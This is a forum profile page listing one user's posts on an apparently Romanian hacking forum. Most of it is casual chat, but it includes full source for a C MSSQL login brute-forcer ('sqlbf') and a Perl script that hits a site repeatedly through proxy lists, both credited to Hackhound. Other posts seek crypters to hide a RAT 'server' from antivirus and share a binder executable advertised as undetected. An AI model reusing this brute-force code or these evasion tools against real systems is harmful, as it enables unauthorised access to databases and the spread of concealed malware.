-
Posts
860 -
Joined
-
Last visited
Everything posted by Gabriel87
-
Pune-ma si pe mine pe lista Thanks !
-
?Eminem feat. Nate Dogg - Till I Collapse?? - YouTube
-
Normal ca nu poti ca nu aia e parola e criptata Crypted With ARMON-64-->ATOM-128-->BASE-64
-
Mda.. sorry nu am stiut ca e cryptat cu Fly-Crypter
-
@merdenea , USG de la Fly-Crypter sau de la care ? ca chiar is curios daca merge ca am si eu nevoie de un crypter sa imi cryptez un server
-
@AhEaD , cand o sa fie in picioare sugestia asta ?
-
Iti doresc sanatate si bafta in tot ce faci
-
@Cdupof , " ^ Nici n ucred ca stii cum arata Nemessis. Ca de altfel multi altii de pe aici (incluzandu-ma si pe mine). "
-
@Gecko , dar tu sti cum arata ma Nemessis de zici de altii ca nu stiu cum arata el
-
Nici poveste.. nu e Nemessis
-
Mda..e vechi programul asta ma
-
Interesanta ideea.. si eu sunt de acord
-
#!/usr/bin/perl use Socket; use IO::Socket::INET; use MIME::Base64; use LWP::UserAgent; use LWP::Simple; use URI::URL; print("Site à visiter :\n"); chomp($site = <STDIN>); print("Tentative de connexion ....."); if($content = get($site)) { print("réussi\n\n"); }else{ print("fail\n\n"); exit; } #-------------------------------------# #-- Envoi des requetes aux Webproxy --# #-------------------------------------# print("------------------------\n"); print("- Visite par webproxy -\n"); print("------------------------\n\n"); # Je code l'adresse du site en base64 $base64 = encode_base64($site); #Je récupère le contenu du fichier où sont afficher les webproxy if( -z "proxy" ) { print "Le fichier webproxy est vide\n"; exit; } open WEBPROXY,"webproxy" or die "E/S : $!\n"; while(<WEBPROXY>){ chomp($proxy= $_); print("Visite via http://$proxy ....."); $content = get("http://$proxy/index.php?q=$base64"); print("Done\n"); } #------------------------------------# #-- J'envoie des sockets aux proxy --# #------------------------------------# print("\n\n"); print("---------------------\n"); print("- Visite par proxy -\n"); print("---------------------\n\n"); if( -z "proxy" ) { print "Le fichier proxy est vide\n"; exit; } open PROXY,"proxy" or die "E/S : $!\n"; while(<PROXY>){ chomp($proxy = $_); print("Visite via http://$proxy ....."); $ua = LWP::UserAgent->new; $ENV{HTTP_proxy} = "http://$proxy"; $ua->env_proxy; my $req = HTTP::Request->new(GET => "http://$site"); $print = $ua->request($req)->as_string; delete $ENV{HTTP_PROXY}; print("Done\n"); } print("\n\nAll hit done.\n\n"); Sursa : Hackhound
-
Sters ! rog un moderator/admin sa mute topicul la gunoi Multumesc
-
/* sqlbf - MSSQL server brute force tool by xaphan (xaphan@hushmail.com) This is a tool for auditing the strength of your SQL login passwords. Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List] ODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS) IP list - text file containing list of IPs to audit User list - text file containing list of Usernames Password List - text file containing list of passwords I don't do much error checking, so don't screw up. */ #include "stdafx.h" int sqlpoke(char *constr) { SQLHENV henv = SQL_NULL_HENV; SQLHDBC hdbc1 = SQL_NULL_HDBC; SQLHSTMT hstmt1 = SQL_NULL_HSTMT; RETCODE retcode; SQLCHAR szOutConn[1024], sqlstate[6], errmsg[SQL_MAX_MESSAGE_LENGTH]; SQLSMALLINT szint, msglen; SQLINTEGER nativeerr; int count=0, l = 0, p = 0; retcode = SQLAllocHandle (SQL_HANDLE_ENV, NULL, &henv); retcode = SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER); retcode = SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc1); retcode = SQLDriverConnect(hdbc1, NULL, (SQLTCHAR*)constr, SQL_NTS, szOutConn, 1024, &szint, SQL_DRIVER_NOPROMPT); if (retcode == SQL_ERROR) { // 28000 == bad user/pass if ( SQLGetDiagRec(SQL_HANDLE_DBC, hdbc1, 1, sqlstate, &nativeerr, errmsg, sizeof(errmsg), &msglen) != SQL_ERROR) { if ( strcmp((char *)sqlstate, "28000") == 0) { //try again SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); return 0; } // dont bother trying again SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); return -1; } } SQLDisconnect(hdbc1); SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); // successful connect return 1; } void usage() { printf("\nUsage:\tsqlbf [ODBC NetLib] [IP List] [User list] [Password List]\n\n"); printf("\t\tODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS)\n\n"); return; } int main(int argc, char* argv[]) { char *data, ip[20], username[20], password[20], constr[1024]; int mode, c = 0, err; HKEY hReg; DWORD type, so_data; FILE *ips, *users, *pwds; if (argc != 5) { usage(); return 0; } if ( strcmp(argv[1], "P") == 0 ) mode = 0; else mode = 1; //open IP list if ( (ips = fopen(argv[2], "rt")) == NULL) { printf("Error opening IP list.\n"); return 0; } //open user list if ( (users = fopen(argv[3], "rt")) == NULL) { printf("Error opening user list.\n"); return 0; } //open pwd list if ( (pwds = fopen(argv[4], "rt")) == NULL) { printf("Error opening password list.\n"); return 0; } data = (char *)malloc(64); // set the default client lib if ( RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", 0, KEY_ALL_ACCESS, &hReg) == ERROR_SUCCESS) { //store previous value if ( RegQueryValueEx(hReg, "DSQUERY", NULL, &type, (unsigned char *)data, &so_data) != ERROR_SUCCESS) { printf("Unable to store SQL Library value.\n"); free(data); return 0; } switch (mode ) { case 0: // Named Pipes so_data = strlen("DBNMPNTW") + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBNMPNTW", so_data); break; case 1: // TCP/IP so_data = strlen("DBMSSOCN") + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBMSSOCN", so_data); break; } if (err != 0) { printf("Error Setting SQL Network Library.\n"); free(data); return 0; } } while (!feof(ips)) { //read IP from stream fgets(ip, 20, ips); while (ip[c] != '\0') { if (ip[c] == '\n') ip[c] = '\0'; c++; } c = 0; while (!feof(users)) { //read username from stream fgets(username, 20, users); while (username[c] != '\0') { if (username[c] == '\n') username[c] = '\0'; c++; } c = 0; while (!feof(pwds)) { //read a password from pwd stream fgets(password, 20, pwds); while (password[c] != '\0') { if (password[c] == '\n') password[c] = '\0'; c++; } c = 0; //build connection stream based on mode if (mode == 0) { sprintf(constr, "%s%s%s%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, "," , ";UID=", username,";PWD=", password); } else { //the port should be set by the user or in an ini, but I'm lazy sprintf(constr, "%s%s%s%d%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, ",", 1433, ";UID=", username,";PWD=", password); } //call sqlpoke err = sqlpoke(constr); if ( err == 1) { printf("\nConnected to %s with username \'%s\' and password \'%s\'\n", ip, username, password); break; } else if (err == -1) { //Bail out of this IP printf("\nError - unable to connect to SQL server on %s.\n", ip); fseek(pwds, 0, SEEK_SET); fseek(users, 0, SEEK_SET); goto next; // Mmmm... a goto } printf("."); } fseek(pwds, 0, SEEK_SET); } fseek(users, 0, SEEK_SET); next:; } so_data = strlen(data) + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)data, so_data); if (err != 0) printf("Error resetting the SQL network library.\n"); free(data); RegCloseKey(hReg); printf("\nFin.\n"); return 0; } Sursa : Hackhound
-
Done , i-am trimis invitatia @unknown. , cu placere
-
@unknown. , daca ala o facut un post.. ca da invitatie free FL .. asta nu inseamna ca nu am voie sa dau si eu @p3tru , ai dreptate.. dar daca te referi cand da toata lumea ca are invitatii free asta nu inseamna ca eu cer banii pe ea/ele ca si daca aveam invitatii cumparate le dadeam free ca nu sunt ca altii sa dea pt bani .. imi place sa ajut oamenii la nevoi
-
?The Game - Never Can Say Goodbye ( NEW MUSIC VIDEO)?? - YouTube
-
Am doua invitatii Filelist le dau moka.. la cine cred ca merita.
-
FearDotCom aka Smenaru4u baiatul a bagat frica in userii RST :))
Gabriel87 replied to Gby's topic in Cosul de gunoi
Altu.. te-ai trezit ma si tu ? -
File Info Report date: 2011-07-12 21:32:05 (GMT 1) File name: xbinder-exe File size: 778752 bytes MD5 Hash: beee3f3314391e7c7a04539aacdd66c8 SHA1 Hash: 40f30e0e7758bcda269964798e1bf8eeb8076d9d Detection rate: 0 on 5 (0%) Status: CLEAN Detections AVG - Avira AntiVir - ClamAV - Emsisoft - TrendMicro - Scan report generated by NoVirusThanks.org Download : MEGAUPLOAD - The leading online storage and file delivery service
-
6. Cererile se fac in topicul special. Trebuie sa ai MINIM 10 POSTURI/CERERE Eu stiu ca numa la cereri iti trebuie 10 posturi... eu nu vad sa ceara ceva
-
Eu m-am obisnuit cu google chrome si merge bine nu am treaba cu el
-
Mi-e nu imi merge se deschide rat(MS-DOS) imi apare starting nmap... si dupaia se inchide fereastra cmd